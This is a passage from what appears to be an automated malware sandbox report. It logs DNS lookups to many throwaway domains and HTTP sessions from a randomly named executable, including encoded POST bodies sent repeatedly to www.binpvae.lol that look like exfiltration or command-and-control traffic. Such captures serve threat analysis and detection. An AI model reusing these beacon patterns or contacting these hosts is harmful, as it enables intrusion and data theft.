                  Jul 4, 2024 03:13:51.090039968 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:51.090049028 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:51.090152025 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:51.090158939 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:51.090172052 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:51.763485909 CEST4977780192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:52.042428970 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:52.042649031 CEST8049778202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:52.042745113 CEST4977880192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:52.591671944 CEST4977880192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:52.783879042 CEST4977980192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:52.788676977 CEST804977935.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:52.788840055 CEST4977980192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:52.790652990 CEST4977980192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:52.795394897 CEST804977935.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:53.611563921 CEST4978080192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:53.623119116 CEST804977935.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:53.623135090 CEST804977935.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:53.623188019 CEST804977935.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:53.623198032 CEST804977935.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:53.623207092 CEST804977935.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:53.623251915 CEST4977980192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:53.623435974 CEST804977935.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:53.623445034 CEST804977935.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:53.623451948 CEST804977935.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:53.623475075 CEST4977980192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:53.623490095 CEST4977980192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:53.623662949 CEST8049780202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:53.623720884 CEST4978080192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:53.626059055 CEST4978080192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:53.629578114 CEST4977980192.168.2.435.190.52.58
                  Jul 4, 2024 03:13:53.630781889 CEST8049780202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:53.634305000 CEST804977935.190.52.58192.168.2.4
                  Jul 4, 2024 03:13:54.555488110 CEST8049780202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:54.555636883 CEST8049780202.95.21.152192.168.2.4
                  Jul 4, 2024 03:13:54.555824995 CEST4978080192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:54.559906006 CEST4978080192.168.2.4202.95.21.152
                  Jul 4, 2024 03:13:54.564591885 CEST8049780202.95.21.152192.168.2.4

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 4, 2024 03:10:19.857705116 CEST5630753192.168.2.41.1.1.1
                  Jul 4, 2024 03:10:20.782758951 CEST53563071.1.1.1192.168.2.4
                  Jul 4, 2024 03:10:36.766735077 CEST5853153192.168.2.41.1.1.1
                  Jul 4, 2024 03:10:37.145905972 CEST53585311.1.1.1192.168.2.4
                  Jul 4, 2024 03:11:11.283696890 CEST5370053192.168.2.41.1.1.1
                  Jul 4, 2024 03:11:11.315695047 CEST53537001.1.1.1192.168.2.4
                  Jul 4, 2024 03:11:19.378156900 CEST5756453192.168.2.41.1.1.1
                  Jul 4, 2024 03:11:19.387598038 CEST53575641.1.1.1192.168.2.4
                  Jul 4, 2024 03:11:27.571491003 CEST6310653192.168.2.41.1.1.1
                  Jul 4, 2024 03:11:28.357954025 CEST53631061.1.1.1192.168.2.4
                  Jul 4, 2024 03:11:41.924815893 CEST5386153192.168.2.41.1.1.1
                  Jul 4, 2024 03:11:42.282088995 CEST53538611.1.1.1192.168.2.4
                  Jul 4, 2024 03:12:16.331712961 CEST6510353192.168.2.41.1.1.1
                  Jul 4, 2024 03:12:16.569386005 CEST53651031.1.1.1192.168.2.4
                  Jul 4, 2024 03:12:35.404607058 CEST6395953192.168.2.41.1.1.1
                  Jul 4, 2024 03:12:35.797411919 CEST53639591.1.1.1192.168.2.4
                  Jul 4, 2024 03:13:10.047499895 CEST5849853192.168.2.41.1.1.1
                  Jul 4, 2024 03:13:10.060240984 CEST53584981.1.1.1192.168.2.4
                  Jul 4, 2024 03:13:23.177923918 CEST5725753192.168.2.41.1.1.1
                  Jul 4, 2024 03:13:23.205317974 CEST53572571.1.1.1192.168.2.4
                  Jul 4, 2024 03:13:29.196033001 CEST5200753192.168.2.41.1.1.1
                  Jul 4, 2024 03:13:29.243078947 CEST53520071.1.1.1192.168.2.4
                  Jul 4, 2024 03:13:36.847847939 CEST6537253192.168.2.41.1.1.1
                  Jul 4, 2024 03:13:36.878722906 CEST53653721.1.1.1192.168.2.4
                  Jul 4, 2024 03:13:44.955859900 CEST6545953192.168.2.41.1.1.1
                  Jul 4, 2024 03:13:45.166656017 CEST53654591.1.1.1192.168.2.4
                  Jul 4, 2024 03:13:45.532718897 CEST6203053192.168.2.41.1.1.1
                  Jul 4, 2024 03:13:46.000287056 CEST53620301.1.1.1192.168.2.4
                  Jul 4, 2024 03:13:58.643754959 CEST5907053192.168.2.41.1.1.1
                  Jul 4, 2024 03:13:58.652618885 CEST53590701.1.1.1192.168.2.4
                  Jul 4, 2024 03:14:00.278691053 CEST5351453192.168.2.41.1.1.1
                  Jul 4, 2024 03:14:00.289150953 CEST53535141.1.1.1192.168.2.4

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jul 4, 2024 03:10:19.857705116 CEST192.168.2.41.1.1.10x29aaStandard query (0)www.778981.comA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:10:36.766735077 CEST192.168.2.41.1.1.10x549eStandard query (0)www.binpvae.lolA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:11:11.283696890 CEST192.168.2.41.1.1.10xeeb2Standard query (0)www.byteffederal.comA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:11:19.378156900 CEST192.168.2.41.1.1.10x5210Standard query (0)www.jjkelker.comA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:11:27.571491003 CEST192.168.2.41.1.1.10x9d72Standard query (0)www.a9jcpf.topA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:11:41.924815893 CEST192.168.2.41.1.1.10xeba8Standard query (0)www.mhtnvro.lolA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:12:16.331712961 CEST192.168.2.41.1.1.10xf149Standard query (0)www.lexiecos.topA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:12:35.404607058 CEST192.168.2.41.1.1.10xc8d2Standard query (0)www.augaqfp.lolA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:13:10.047499895 CEST192.168.2.41.1.1.10x6beStandard query (0)www.webuyfontana.comA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:13:23.177923918 CEST192.168.2.41.1.1.10x32bbStandard query (0)www.ytw6.topA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:13:29.196033001 CEST192.168.2.41.1.1.10xf1ceStandard query (0)www.ndhockeyprospects.comA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:13:36.847847939 CEST192.168.2.41.1.1.10x99afStandard query (0)www.caroinapottery.comA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:13:44.955859900 CEST192.168.2.41.1.1.10x8f3cStandard query (0)www.hsck520.comA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:13:45.532718897 CEST192.168.2.41.1.1.10x311aStandard query (0)www.qmancha.comA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:13:58.643754959 CEST192.168.2.41.1.1.10x5558Standard query (0)www.mebutnotme.storeA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:14:00.278691053 CEST192.168.2.41.1.1.10x997Standard query (0)www.cloud-force.clubA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jul 4, 2024 03:10:20.782758951 CEST1.1.1.1192.168.2.40x29aaNo error (0)www.778981.comxjc-g1171-6-g-1584411309302y.onlinename11txcnddns.comCNAME (Canonical name)IN (0x0001)false
                  Jul 4, 2024 03:10:20.782758951 CEST1.1.1.1192.168.2.40x29aaNo error (0)xjc-g1171-6-g-1584411309302y.onlinename11txcnddns.comg1171-6-g-1584411309302y.greycdn.netCNAME (Canonical name)IN (0x0001)false
                  Jul 4, 2024 03:10:20.782758951 CEST1.1.1.1192.168.2.40x29aaNo error (0)g1171-6-g-1584411309302y.greycdn.netc96e98f1fy.greycdn.netCNAME (Canonical name)IN (0x0001)false
                  Jul 4, 2024 03:10:20.782758951 CEST1.1.1.1192.168.2.40x29aaNo error (0)c96e98f1fy.greycdn.net7a4ca695fd164z.greycdn.netCNAME (Canonical name)IN (0x0001)false
                  Jul 4, 2024 03:10:20.782758951 CEST1.1.1.1192.168.2.40x29aaNo error (0)7a4ca695fd164z.greycdn.net165.154.0.120A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:10:37.145905972 CEST1.1.1.1192.168.2.40x549eNo error (0)www.binpvae.lol116.213.43.190A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:11:11.315695047 CEST1.1.1.1192.168.2.40xeeb2Name error (3)www.byteffederal.comnonenoneA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:11:19.387598038 CEST1.1.1.1192.168.2.40x5210Name error (3)www.jjkelker.comnonenoneA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:11:28.357954025 CEST1.1.1.1192.168.2.40x9d72No error (0)www.a9jcpf.topkmdne.ajunsdfancsda.comCNAME (Canonical name)IN (0x0001)false
                  Jul 4, 2024 03:11:28.357954025 CEST1.1.1.1192.168.2.40x9d72No error (0)kmdne.ajunsdfancsda.comaj.ajunsdfancsda.comCNAME (Canonical name)IN (0x0001)false
                  Jul 4, 2024 03:11:28.357954025 CEST1.1.1.1192.168.2.40x9d72No error (0)aj.ajunsdfancsda.com207.148.37.252A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:11:28.357954025 CEST1.1.1.1192.168.2.40x9d72No error (0)aj.ajunsdfancsda.com147.92.38.243A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:11:28.357954025 CEST1.1.1.1192.168.2.40x9d72No error (0)aj.ajunsdfancsda.com45.126.181.243A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:11:28.357954025 CEST1.1.1.1192.168.2.40x9d72No error (0)aj.ajunsdfancsda.com147.92.36.231A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:11:28.357954025 CEST1.1.1.1192.168.2.40x9d72No error (0)aj.ajunsdfancsda.com147.92.36.233A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:11:28.357954025 CEST1.1.1.1192.168.2.40x9d72No error (0)aj.ajunsdfancsda.com45.126.181.242A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:11:28.357954025 CEST1.1.1.1192.168.2.40x9d72No error (0)aj.ajunsdfancsda.com147.92.36.232A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:11:42.282088995 CEST1.1.1.1192.168.2.40xeba8No error (0)www.mhtnvro.lol116.213.43.190A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:12:16.569386005 CEST1.1.1.1192.168.2.40xf149No error (0)www.lexiecos.top203.161.55.102A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:12:35.797411919 CEST1.1.1.1192.168.2.40xc8d2No error (0)www.augaqfp.lol116.213.43.190A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:13:10.060240984 CEST1.1.1.1192.168.2.40x6beNo error (0)www.webuyfontana.com13.248.169.48A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:13:10.060240984 CEST1.1.1.1192.168.2.40x6beNo error (0)www.webuyfontana.com76.223.54.146A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:13:23.205317974 CEST1.1.1.1192.168.2.40x32bbNo error (0)www.ytw6.topytw6.topCNAME (Canonical name)IN (0x0001)false
                  Jul 4, 2024 03:13:23.205317974 CEST1.1.1.1192.168.2.40x32bbNo error (0)ytw6.top38.47.232.224A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:13:29.243078947 CEST1.1.1.1192.168.2.40xf1ceNo error (0)www.ndhockeyprospects.comndhockeyprospects.comCNAME (Canonical name)IN (0x0001)false
                  Jul 4, 2024 03:13:29.243078947 CEST1.1.1.1192.168.2.40xf1ceNo error (0)ndhockeyprospects.com162.241.253.174A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:13:36.878722906 CEST1.1.1.1192.168.2.40x99afName error (3)www.caroinapottery.comnonenoneA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:13:45.166656017 CEST1.1.1.1192.168.2.40x8f3cNo error (0)www.hsck520.com35.190.52.58A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:13:46.000287056 CEST1.1.1.1192.168.2.40x311aNo error (0)www.qmancha.com202.95.21.152A (IP address)IN (0x0001)false
                  Jul 4, 2024 03:13:58.652618885 CEST1.1.1.1192.168.2.40x5558Name error (3)www.mebutnotme.storenonenoneA (IP address)IN (0x0001)false
                  Jul 4, 2024 03:14:00.289150953 CEST1.1.1.1192.168.2.40x997Server failure (2)www.cloud-force.clubnonenoneA (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • www.778981.com
                  • www.binpvae.lol
                  • www.a9jcpf.top
                  • www.mhtnvro.lol
                  • www.lexiecos.top
                  • 185.234.72.101
                  • www.augaqfp.lol
                  • www.webuyfontana.com
                  • www.ytw6.top
                  • www.ndhockeyprospects.com
                  • www.hsck520.com
                  • www.qmancha.com

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449736165.154.0.120802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:10:20.795047998 CEST495OUTGET /p1dd/?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=G7DDmCfNGXy3uJCEgcIIU1iXFvarFYWbvsRS9sxoYaNScQyM2A1goKEbo8KV9mX8trrejs5AH6YGa7AwDEXag2zD7gw0a+PZJfygUURv+5LCwJWR5NAeUOI= HTTP/1.1
                  Host: www.778981.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Jul 4, 2024 03:10:21.714555979 CEST1236INHTTP/1.1 200 OK
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:10:21 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 3915
                  Connection: close
                  Last-Modified: Thu, 13 Jun 2024 18:55:23 GMT
                  Vary: Accept-Encoding
                  ETag: "666b409b-f4b"
                  Accept-Ranges: bytes
                  Data Raw: ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e8 af 9a e4 bf a1 e5 ae 89 e5 85 a8 ef bc 8c e8 b6 85 e5 87 a1 e4 bd 93 e9 aa 8c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2e 37 66 65 32 33 65 65 61 65 65 31 39 31 31 35 32 32 35 64 39 2e 63 73 73 22 3e 3c 2f 68 65 61 64 3e 0a 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 61 70 70 2d 72 6f 6f 74 3e 3c 2f 61 70 70 2d 72 6f 6f 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <title></title> <base href="/" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" href="styles.7fe23eeaee19115225d9.css"></head> <body> <app-root></app-root> <script src="https://v-cn.vaptcha.com/v3.js" async defer></script> ... Start of LiveChat (www.livechat.com) code --> <script> if (document.domain.includes('hs246.com') || document.domain.includes('xjc893.com')) { window.__lc = window.__lc || {} window.__lc.license = 14282961 ;(function (n, t, c) { function i(n) { return e._h ? e._h.apply(null, n) : e._q.push(n) } var e = { _q: [], _h: null, _v: '2.0', on: function () { i(['on', c.call(arguments)]) }, once: function () {
                  Jul 4, 2024 03:10:21.714987040 CEST224INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 28 5b 27 6f 6e 63 65 27 2c 20 63 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 5d 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 66 66 3a 20 66 75 6e 63
                  Data Ascii: i(['once', c.call(arguments)]) }, off: function () { i(['off', c.call(arguments)]) }, get: function () { if (!e._h) throw new Error("
                  Jul 4, 2024 03:10:21.714996099 CEST1236INData Raw: 5b 4c 69 76 65 43 68 61 74 57 69 64 67 65 74 5d 20 59 6f 75 20 63 61 6e 27 74 20 75 73 65 20 67 65 74 74 65 72 73 20 62 65 66 6f 72 65 20 6c 6f 61 64 2e 22 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 69 28 5b 27 67 65 74
                  Data Ascii: [LiveChatWidget] You can't use getters before load.") return i(['get', c.call(arguments)]) }, call: function () { i(['call', c.call(arguments)]) }, init: function () {
                  Jul 4, 2024 03:10:21.716105938 CEST1236INData Raw: 3a 20 27 32 2e 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 6f 6e 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 28 5b 27 6f 6e 27 2c 20 63 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 5d 29 0a 20 20 20 20
                  Data Ascii: : '2.0', on: function () { i(['on', c.call(arguments)]) }, once: function () { i(['once', c.call(arguments)]) }, off: function () { i(['off', c.call(argument
                  Jul 4, 2024 03:10:21.716114998 CEST248INData Raw: 63 72 69 70 74 20 73 72 63 3d 22 70 6f 6c 79 66 69 6c 6c 73 2d 65 73 35 2e 66 34 61 39 39 64 35 31 65 65 61 37 66 32 63 37 35 34 61 65 2e 6a 73 22 20 6e 6f 6d 6f 64 75 6c 65 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 70
                  Data Ascii: cript src="polyfills-es5.f4a99d51eea7f2c754ae.js" nomodule></script><script src="polyfills.7033c6f4843a0f0135c9.js"></script><script src="scripts.5e45ff3d9a5f89eacb48.js"></script><script src="main.259892d8df6d082d7c24.js"></script></body></h


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.449737116.213.43.190802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:10:37.155345917 CEST753OUTPOST /kfqo/ HTTP/1.1
                  Host: www.binpvae.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.binpvae.lol
                  Referer: http://www.binpvae.lol/kfqo/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 205
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 41 67 6d 39 54 37 44 4b 4d 41 32 38 4e 6e 70 74 34 4c 63 69 39 59 44 36 6f 74 7a 43 42 4c 67 71 74 32 70 78 59 36 58 41 35 71 79 75 6c 48 44 64 31 49 36 6e 44 4d 51 65 6d 34 70 57 4f 59 31 35 37 4c 59 70 78 30 50 54 51 63 73 48 6d 5a 34 4c 6a 4c 6a 43 2b 70 78 77 4d 77 42 77 52 55 32 6d 54 59 50 66 73 6e 69 45 4f 47 2f 47 4e 73 6f 62 63 38 2b 44 49 31 74 6b 55 69 58 32 70 78 54 56 61 4e 75 54 39 72 2b 58 35 4c 34 58 74 6f 74 6f 73 34 48 4a 4c 67 4a 46 67 45 47 6e 4c 57 5a 61 43 49 38 34 66 57 4e 51 56 55 6e 78 4a 6b 51 6f 41 41 35 4d 72 6a 41 6a 35 48 50 4f 57 49 31 68 4c 77 3d 3d
                  Data Ascii: n02X2xPX=Agm9T7DKMA28Nnpt4Lci9YD6otzCBLgqt2pxY6XA5qyulHDd1I6nDMQem4pWOY157LYpx0PTQcsHmZ4LjLjC+pxwMwBwRU2mTYPfsniEOG/GNsobc8+DI1tkUiX2pxTVaNuT9r+X5L4Xtotos4HJLgJFgEGnLWZaCI84fWNQVUnxJkQoAA5MrjAj5HPOWI1hLw==


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.449738116.213.43.190802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:10:39.695122004 CEST773OUTPOST /kfqo/ HTTP/1.1
                  Host: www.binpvae.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.binpvae.lol
                  Referer: http://www.binpvae.lol/kfqo/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 225
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 41 67 6d 39 54 37 44 4b 4d 41 32 38 4d 48 35 74 36 6f 6b 69 73 6f 44 39 6e 4e 7a 43 50 72 67 75 74 32 6c 78 59 2f 32 62 35 63 71 75 6c 6a 48 64 30 4a 36 6e 43 4d 51 65 75 59 70 5a 4b 59 31 79 37 4c 46 55 78 77 50 54 51 66 51 48 6d 62 67 4c 6a 36 6a 64 2b 35 78 79 58 67 42 32 56 55 32 6d 54 59 50 66 73 6e 32 2b 4f 48 62 47 4e 64 59 62 65 59 53 41 42 56 74 6e 54 69 58 32 2b 42 54 5a 61 4e 75 74 39 71 69 74 35 4a 77 58 74 73 6c 6f 73 70 48 4f 65 51 4a 4c 75 6b 48 6c 42 32 30 43 4f 4b 4a 32 48 33 4e 52 4b 6c 6a 64 42 43 42 79 52 78 59 62 35 6a 6b 51 6b 41 47 36 62 4c 49 6f 51 2b 46 62 42 6f 4b 48 30 65 32 30 6b 57 30 77 4f 65 6d 61 56 2f 45 3d
                  Data Ascii: n02X2xPX=Agm9T7DKMA28MH5t6okisoD9nNzCPrgut2lxY/2b5cquljHd0J6nCMQeuYpZKY1y7LFUxwPTQfQHmbgLj6jd+5xyXgB2VU2mTYPfsn2+OHbGNdYbeYSABVtnTiX2+BTZaNut9qit5JwXtslospHOeQJLukHlB20COKJ2H3NRKljdBCByRxYb5jkQkAG6bLIoQ+FbBoKH0e20kW0wOemaV/E=


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.449739116.213.43.190802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:10:42.347687006 CEST10855OUTPOST /kfqo/ HTTP/1.1
                  Host: www.binpvae.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.binpvae.lol
                  Referer: http://www.binpvae.lol/kfqo/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 10305
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 41 67 6d 39 54 37 44 4b 4d 41 32 38 4d 48 35 74 36 6f 6b 69 73 6f 44 39 6e 4e 7a 43 50 72 67 75 74 32 6c 78 59 2f 32 62 35 63 69 75 6c 51 50 64 31 71 69 6e 59 4d 51 65 6b 34 70 61 4b 59 31 76 37 4c 63 66 78 77 44 44 51 5a 63 48 67 4f 30 4c 68 49 62 64 30 35 78 79 65 41 42 33 52 55 32 33 54 59 65 58 73 6e 6d 2b 4f 48 62 47 4e 65 41 62 4e 73 2b 41 48 56 74 6b 55 69 58 4d 70 78 54 31 61 4a 37 57 39 71 6d 39 36 35 51 58 74 4e 5a 6f 6a 37 2f 4f 63 77 4a 65 74 6b 48 48 42 32 34 6a 4f 4b 56 4d 48 33 34 30 4b 6c 58 64 43 47 67 6c 4a 30 34 62 6a 67 41 31 35 52 53 45 58 4c 45 64 49 70 31 66 52 74 65 4f 75 36 36 70 2b 32 70 33 5a 74 6e 65 58 70 2f 6f 46 47 77 76 38 4b 62 32 6c 42 5a 66 49 73 6a 49 78 55 43 42 44 79 2f 47 4e 36 35 41 4f 61 72 46 45 55 2f 79 54 44 4c 2f 58 52 72 39 30 71 34 39 4d 4f 74 52 4b 55 66 55 48 30 54 61 56 62 5a 50 46 4f 77 70 6c 49 72 7a 43 41 63 49 77 31 44 54 6d 68 74 65 53 68 76 61 5a 72 2f 36 78 34 62 35 52 72 5a 6c 33 56 77 42 76 74 39 45 76 63 63 57 39 [TRUNCATED]
                  Data Ascii: n02X2xPX=Agm9T7DKMA28MH5t6okisoD9nNzCPrgut2lxY/2b5ciulQPd1qinYMQek4paKY1v7LcfxwDDQZcHgO0LhIbd05xyeAB3RU23TYeXsnm+OHbGNeAbNs+AHVtkUiXMpxT1aJ7W9qm965QXtNZoj7/OcwJetkHHB24jOKVMH340KlXdCGglJ04bjgA15RSEXLEdIp1fRteOu66p+2p3ZtneXp/oFGwv8Kb2lBZfIsjIxUCBDy/GN65AOarFEU/yTDL/XRr90q49MOtRKUfUH0TaVbZPFOwplIrzCAcIw1DTmhteShvaZr/6x4b5RrZl3VwBvt9EvccW9h3qCQguCSkHF/sRQyUPc/7k0hL6pai5fZHjm3vUcFVEkCtU2ZUshffr8dKRxUavw0g4X8mqB3jyjwAfCA8pcBVY0Rg6PBz/5vrWf0ataoZ2RWbYRn98XXzRzkAeQGryFeLmN9OFVaeepFDB95i0fLmaNsatK+sQxM/nFUuiJeOAl0iHPhh+kGIpH9wLzStA7iNZ07PEgkkXbYMHVZ3mn+JCgT8wvqdnpkScgzjxBCPlRk+CkHnT3O31ALVGGN2P8FKB0s+XySLPtJj4GF3JXVT7zaEbWHFX3eCpdS2W6eBlgsejNYgZhtCi9SNqDfDY7LEXc/QHvslaq1BggdVoH6eXxW4AF01dQMgJZNiBVRq6X7gvIySW26pvTS2rq+DiDM1Xh0HK+kml8Gp/Hoai4fa8TxaY59R2VO8DBJxSi9WYiXO8X7ks8WVfS44r40/dljmZUdxl4IYYEHF1H0MVkKmiCKcjHC9zlgfOGLDDQHghWZ/EJ35+JjgmUuuGytcCzIGnYgdfP6YTzXnO0RG11lOBJGxlv5qma5fNV0EKsrEvs6QrmV22bx8yM1RIP+51OpC915izKRT609QOOy/RIvINdyLe7ZtNVL/y3IfNZpAMvyPzL28JIZEHKV0F3lDiZt64ncCKQ4S+oWbESJGoMGWRJCJKC5nGOsC [TRUNCATED]


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
